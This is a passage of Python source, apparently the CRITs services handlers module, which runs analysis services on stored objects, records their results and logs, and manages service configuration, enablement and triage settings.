from crits.core.user_tools import user_sources
from crits.services.analysis_result import AnalysisResult, AnalysisConfig
from crits.services.analysis_result import EmbeddedAnalysisResultLog
from crits.services.core import ServiceConfigError, AnalysisTask
from crits.services.service import CRITsService
logger = logging.getLogger(__name__)
def generate_analysis_results_csv(request):
"""
Generate a CSV file of the Analysis Results information
:param request: The request for this CSV.
:type request: :class:`django.http.HttpRequest`
:returns: :class:`django.http.HttpResponse`
"""
response = csv_export(request,AnalysisResult)
return response
def generate_analysis_results_jtable(request, option):
"""
Generate the jtable data for rendering in the list template.
:param request: The request for this jtable.
:type request: :class:`django.http.HttpRequest`
:param option: Action to take.
:type option: str of either 'jtlist', 'jtdelete', or 'inline'.
:returns: :class:`django.http.HttpResponse`
"""
obj_type = AnalysisResult
type_ = "analysis_result"
mapper = obj_type._meta['jtable_opts']
if option == "jtlist":
# Sets display url
details_url = mapper['details_url']
details_url_key = mapper['details_url_key']
fields = mapper['fields']
response = jtable_ajax_list(obj_type,
details_url,
details_url_key,
request,
includes=fields)
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
if option == "jtdelete":
response = {"Result": "ERROR"}
if jtable_ajax_delete(obj_type,request):
response = {"Result": "OK"}
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
jtopts = {
'title': "Analysis Results",
'default_sort': mapper['default_sort'],
'listurl': reverse('crits.services.views.%ss_listing' % type_,
args=('jtlist',)),
'deleteurl': reverse('crits.services.views.%ss_listing' % type_,
args=('jtdelete',)),
'searchurl': reverse(mapper['searchurl']),
'fields': mapper['jtopts_fields'],
'hidden_fields': mapper['hidden_fields'],
'linked_fields': mapper['linked_fields'],
'details_link': mapper['details_link'],
'no_sort': mapper['no_sort']
}
jtable = build_jtable(jtopts,request)
jtable['toolbar'] = [
]
if option == "inline":
return render_to_response("jtable.html",
{'jtable': jtable,
'jtid': '%s_listing' % type_,
'button' : '%ss_tab' % type_},
RequestContext(request))
else:
return render_to_response("%s_listing.html" % type_,
{'jtable': jtable,
'jtid': '%s_listing' % type_},
RequestContext(request))
def service_work_handler(service_instance, final_config):
"""
Handles a unit of work for a service by calling the service's "execute"
    method. This function is generally called by processes/threads. It is also
    needed because it is picklable, whereas passing in the
    service_instance.execute method directly is not, since that is an
    instance method.
:param service_instance: The service instance that the work will be performed in
:type service_instance: crits.services.core.Service
    :param final_config: The service's configuration settings
    :type final_config: dict
"""
service_instance.execute(final_config)
def run_service(name, type_, id_, user, obj=None,
execute='local', custom_config={}, is_triage_run=False, **kwargs):
"""
Run a service.
:param name: The name of the service to run.
:type name: str
:param type_: The type of the object.
:type type_: str
:param id_: The identifier of the object.
:type id_: str
:param user: The user running the service.
:type user: str
:param obj: The CRITs object, if given this overrides crits_type and identifier.
:type obj: CRITs object.
:param analyst: The user updating the results.
:type analyst: str
:param execute: The execution type.
:type execute: str
:param custom_config: Use a custom configuration for this run.
:type custom_config: dict
"""
result = {'success': False}
if type_ not in settings.CRITS_TYPES:
result['html'] = "Unknown CRITs type."
return result
if name not in enabled_services():
result['html'] = "Service %s is unknown or not enabled." % name
return result
service_class = crits.services.manager.get_service_class(name)
if not service_class:
result['html'] = "Unable to get service class."
return result
if not obj:
obj = class_from_id(type_, id_)
if not obj:
result['html'] = 'Could not find object.'
return result
service = CRITsService.objects(name=name).first()
if not service:
result['html'] = "Unable to find service in database."
return result
# See if the object is a supported type for the service.
if not service_class.supported_for_type(type_):
result['html'] = "Service not supported for type '%s'" % type_
return result
# When running in threaded mode, each thread needs to have its own copy of
# the object. If we do not do this then one thread may read() from the
    # object (to get the binary) and then the second would read() without
# knowing and get undefined behavior as the file pointer would be who knows
# where. By giving each thread a local copy they can operate independently.
#
# When not running in thread mode this has no effect except wasted memory.
local_obj = local()
local_obj.obj = copy.deepcopy(obj)
# Give the service a chance to check for required fields.
try:
service_class.valid_for(local_obj.obj)
if hasattr(local_obj.obj, 'filedata'):
if local_obj.obj.filedata.grid_id:
# Reset back to the start so the service gets the full file.
local_obj.obj.filedata.seek(0)
except ServiceConfigError as e:
result['html'] = str(e)
return result
# Get the config from the database and validate the submitted options
# exist.
db_config = service.config.to_dict()
try:
service_class.validate_runtime(custom_config, db_config)
except ServiceConfigError as e:
result['html'] = str(e)
return result
final_config = db_config
# Merge the submitted config with the one from the database.
# This is because not all config options may be submitted.
final_config.update(custom_config)
form = service_class.bind_runtime_form(user, final_config)
if form:
if not form.is_valid():
# TODO: return corrected form via AJAX
result['html'] = str(form.errors)
return result
# If the form is valid, create the config using the cleaned data.
final_config = db_config
final_config.update(form.cleaned_data)
logger.info("Running %s on %s, execute=%s" % (name, local_obj.obj.id, execute))
service_instance = service_class(notify=update_analysis_results,
complete=finish_task)
# Determine if this service is being run via triage
if is_triage_run:
service_instance.is_triage_run = True
# Give the service a chance to modify the config that gets saved to the DB.
saved_config = dict(final_config)
service_class.save_runtime_config(saved_config)
task = AnalysisTask(local_obj.obj, service_instance, user)
task.config = AnalysisConfig(**saved_config)
task.start()
add_task(task)
service_instance.set_task(task)
if execute == 'process':
p = Process(target=service_instance.execute, args=(final_config,))
p.start()
elif execute == 'thread':
t = Thread(target=service_instance.execute, args=(final_config,))
t.start()
elif execute == 'process_pool':
if __service_process_pool__ is not None and service.compatability_mode != True:
__service_process_pool__.apply_async(func=service_work_handler,
args=(service_instance, final_config,))
else:
logger.warning("Could not run %s on %s, execute=%s, running in process mode" % (name, local_obj.obj.id, execute))
p = Process(target=service_instance.execute, args=(final_config,))
p.start()
elif execute == 'thread_pool':
if __service_thread_pool__ is not None and service.compatability_mode != True:
__service_thread_pool__.apply_async(func=service_work_handler,
args=(service_instance, final_config,))
else:
logger.warning("Could not run %s on %s, execute=%s, running in thread mode" % (name, local_obj.obj.id, execute))
t = Thread(target=service_instance.execute, args=(final_config,))
t.start()
elif execute == 'local':
service_instance.execute(final_config)
# Return after starting thread so web request can complete.
result['success'] = True
return result
def add_task(task):
"""
Add a new task.
"""
logger.debug("Adding task %s" % task)
insert_analysis_results(task)
def run_triage(obj, user):
"""
Run all services marked as triage against this top-level object.
:param obj: The CRITs top-level object class.
:type obj: Class which inherits from
:class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param user: The user requesting the services to be run.
:type user: str
"""
services = triage_services()
for service_name in services:
try:
run_service(service_name,
obj._meta['crits_type'],
obj.id,
user,
obj=obj,
execute=settings.SERVICE_MODEL,
custom_config={},
is_triage_run=True)
except:
pass
return
def add_result(object_type, object_id, analysis_id, result, type_, subtype,
analyst):
"""
add_results wrapper for a single result.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param result: The result to append.
:type result: str
:param type_: The result type.
:type type_: str
:param subtype: The result subtype.
:type subtype: str
:param analyst: The user updating the results.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
return add_results(object_type, object_id, analysis_id, [result], [type_],
[subtype], analyst)
def add_results(object_type, object_id, analysis_id, result, type_, subtype,
analyst):
"""
Add multiple results to an analysis task.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param result: The list of result to append.
:type result: list of str
:param type_: The list of result types.
:type type_: list of str
:param subtype: The list of result subtypes.
:type subtype: list of str
:param analyst: The user updating the results.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
res = {'success': False}
if not object_type or not object_id or not analysis_id:
res['message'] = "Must supply object id/type and analysis id."
return res
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
sources = user_sources(analyst)
obj = klass.objects(id=object_id, source__name__in=sources).first()
if not obj:
res['message'] = "Could not find object to add results to."
return res
if not(result and type_ and subtype):
res['message'] = "Need a result, type, and subtype to add a result."
return res
if not(len(result) == len(type_) == len(subtype)):
res['message'] = "result, type, and subtype need to be the same length."
return res
# Update analysis results
final_list = []
for key, r in enumerate(result):
final = {}
final['subtype'] = subtype[key]
final['result'] = r
tmp = ast.literal_eval(type_[key])
for k in tmp:
final[k] = tmp[k]
final_list.append(final)
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
if ar:
AnalysisResult.objects(id=ar.id).update_one(push_all__results=final_list)
res['success'] = True
return res
def add_log(object_type, object_id, analysis_id, log_message, level, analyst):
"""
Add a log entry to an analysis task.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param log_message: The log entry to append.
:type log_message: dict
:param level: The log level.
:type level: str
:param analyst: The user updating the log.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
results = {'success': False}
if not object_type or not object_id or not analysis_id:
results['message'] = "Must supply object id/type and analysis id."
return results
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
sources = user_sources(analyst)
obj = klass.objects(id=object_id, source__name__in=sources).first()
if not obj:
results['message'] = "Could not find object to add results to."
return results
# Update analysis log
le = EmbeddedAnalysisResultLog()
le.message = log_message
le.level = level
le.datetime = str(datetime.datetime.now())
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
if ar:
AnalysisResult.objects(id=ar.id).update_one(push__log=le)
results['success'] = True
else:
results['message'] = "Could not find task to add log to."
return results
def finish_task(object_type, object_id, analysis_id, status, analyst):
"""
Finish a task by setting its status to "completed" and setting the finish
date.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param status: The status of the task.
:type status: str ("error", "completed")
:param analyst: The user updating the log.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
results = {'success': False}
if not status:
status = "completed"
if status not in ('error', 'completed'):
status = "completed"
if not object_type or not object_id or not analysis_id:
results['message'] = "Must supply object id/type and analysis id."
return results
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
params = {'id': object_id}
if hasattr(klass, 'source'):
params['source__name__in'] = user_sources(analyst)
obj = klass.objects(**params).first()
if not obj:
results['message'] = "Could not find object to add results to."
return results
# Update analysis log
date = str(datetime.datetime.now())
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
if ar:
AnalysisResult.objects(id=ar.id).update_one(set__status=status,
set__finish_date=date)
results['success'] = True
return results
def update_config(service_name, config, analyst):
"""
Update the configuration for a service.
"""
service = CRITsService.objects(name=service_name).first()
service.config = AnalysisConfig(**config)
try:
#TODO: get/validate the config from service author to set status
#update_status(service_name)
service.save(username=analyst)
return {'success': True}
    except ValidationError as e:
return {'success': False, 'message': e}
def get_service_config(name):
status = {'success': False}
service = CRITsService.objects(name=name, status__ne="unavailable").first()
if not service:
status['error'] = 'Service "%s" is unavailable. Please review error logs.' % name
return status
config = service.config.to_dict()
service_class = crits.services.manager.get_service_class(name)
if not service_class:
status['error'] = 'Service "%s" is unavilable. Please review error logs.' % name
return status
display_config = service_class.get_config_details(config)
status['config'] = display_config
status['config_error'] = _get_config_error(service)
# TODO: fix code so we don't have to do this
status['service'] = service.to_dict()
status['success'] = True
return status
def _get_config_error(service):
"""
Return a string describing the error in the service configuration.
Returns None if there are no errors.
"""
error = None
name = service['name']
config = service['config']
if service['status'] == 'misconfigured':
service_class = crits.services.manager.get_service_class(name)
try:
service_class.parse_config(config.to_dict())
except Exception as e:
error = str(e)
return error
def do_edit_config(name, analyst, post_data=None):
status = {'success': False}
service = CRITsService.objects(name=name, status__ne="unavailable").first()
if not service:
status['config_error'] = 'Service "%s" is unavailable. Please review error logs.' % name
status['form'] = ''
status['service'] = ''
return status
# Get the class that implements this service.
service_class = crits.services.manager.get_service_class(name)
config = service.config.to_dict()
cfg_form, html = service_class.generate_config_form(config)
# This isn't a form object. It's the HTML.
status['form'] = html
status['service'] = service
if post_data:
#Populate the form with values from the POST request
form = cfg_form(post_data)
if form.is_valid():
try:
service_class.parse_config(form.cleaned_data)
except ServiceConfigError as e:
service.status = 'misconfigured'
service.save()
status['config_error'] = str(e)
return status
result = update_config(name, form.cleaned_data, analyst)
if not result['success']:
return status
service.status = 'available'
service.save()
else:
status['config_error'] = form.errors
return status
status['success'] = True
return status
def get_config(service_name):
"""
Get the configuration for a service.
"""
service = CRITsService.objects(name=service_name).first()
if not service:
return None
return service.config
def set_enabled(service_name, enabled=True, analyst=None):
"""
Enable/disable a service in CRITs.
"""
if enabled:
logger.info("Enabling: %s" % service_name)
else:
logger.info("Disabling: %s" % service_name)
service = CRITsService.objects(name=service_name).first()
service.enabled = enabled
try:
service.save(username=analyst)
if enabled:
url = reverse('crits.services.views.disable', args=(service_name,))
else:
url = reverse('crits.services.views.enable', args=(service_name,))
return {'success': True, 'url': url}
    except ValidationError as e:
return {'success': False, 'message': e}
def set_triage(service_name, enabled=True, analyst=None):
"""
Enable/disable a service for running on triage (upload).
"""
if enabled:
logger.info("Enabling triage: %s" % service_name)
else:
logger.info("Disabling triage: %s" % service_name)
service = CRITsService.objects(name=service_name).first()
service.run_on_triage = enabled
try:
service.save(username=analyst)
if enabled:
url = reverse('crits.services.views.disable_triage',
args=(service_name,))
else:
url = reverse('crits.services.views.enable_triage',
args=(service_name,))
return {'success': True, 'url': url}
    except ValidationError as e:
return {'success': False,
'message': e}
def enabled_services(status=True):
"""
Return names of services which are enabled.
"""
if status:
services = CRITsService.objects(enabled=True,
status="available")
else:
services = CRITsService.objects(enabled=True)
return [s.name for s in services]
def get_supported_services(crits_type):
"""
Get the supported services for a type.
"""
services = CRITsService.objects(enabled=True)
for s in sorted(services, key=lambda s: s.name.lower()):
if s.supported_types == 'all' or crits_type in s.supported_types:
yield s.name
def triage_services(status=True):
"""
Return names of services set to run on triage.
"""
if status:
services = CRITsService.objects(run_on_triage=True,
status="available")
else:
services = CRITsService.objects(run_on_triage=True)
return [s.name for s in services]
def delete_analysis(task_id, analyst):
"""
Delete analysis results.
"""
ar = AnalysisResult.objects(id=task_id).first()
if ar:
ar.delete(username=analyst)
def insert_analysis_results(task):
"""
Insert analysis results for this task.
"""
ar = AnalysisResult()
tdict = task.to_dict()
tdict['analysis_id'] = tdict['id']
del tdict['id']
ar.merge(arg_dict=tdict)
ar.save()
def update_analysis_results(task):
"""
Update analysis results for this task.
"""
# If the task does not currently exist for the given sample in the
# database, add it.
found = False
ar = AnalysisResult.objects(analysis_id=task.task_id).first()
if ar:
found = True
if not found:
logger.warning("Tried to update a task that didn't exist.")
insert_analysis_results(task)
else:
# Otherwise, update it.
tdict = task.to_dict()
tdict['analysis_id'] = tdict['id']
del tdict['id']
#TODO: find a better way to do this.
new_dict = {}
        for k in tdict.keys():
new_dict['set__%s' % k] = tdict[k]
try:
AnalysisResult.objects(id=ar.id).update_one(**new_dict)
except Exception as e: # assume bad data in 'results'
task.status = 'error'
new_dict['set__results'] = []
le = EmbeddedAnalysisResultLog()
le.message = 'DB Update Failed: %s' % e
le.level = 'error'
le.datetime = str(datetime.datetime.now())
new_dict['set__log'].append(le)
try:
AnalysisResult.objects(id=ar.id).update_one(**new_dict)
except: # don't know what's wrong, try writing basic log only
AnalysisResult.objects(id=ar.id).update_one(set__log=[le])
# The service pools need to be defined down here because the functions
# that are used by the services must already be defined.
if settings.SERVICE_MODEL == 'thread_pool':
__service_thread_pool__ = ThreadPool(processes=settings.SERVICE_POOL_SIZE)
__service_process_pool__ = None
elif settings.SERVICE_MODEL == 'process_pool':
__service_thread_pool__ = None
__service_process_pool__ = Pool(processes=settings.SERVICE_POOL_SIZE)
else:
__service_thread_pool__ = None
__service_process_pool__ = None
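# Hypothetical usage sketch (not part of handlers.py): kick off a single
# service run against a Sample TLO. The service name, object id and username
# are placeholders; settings.SERVICE_MODEL decides whether the run happens
# locally, in a thread/process, or in one of the pools defined above.
def _run_service_demo():
    result = run_service(name='peinfo',                   # assumed service name
                         type_='Sample',                  # a CRITs TLO type
                         id_='507f1f77bcf86cd799439011',  # placeholder ObjectId
                         user='analyst1',
                         execute=settings.SERVICE_MODEL)
    if not result['success']:
        logger.warning('Service run failed: %s' % result.get('html'))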
|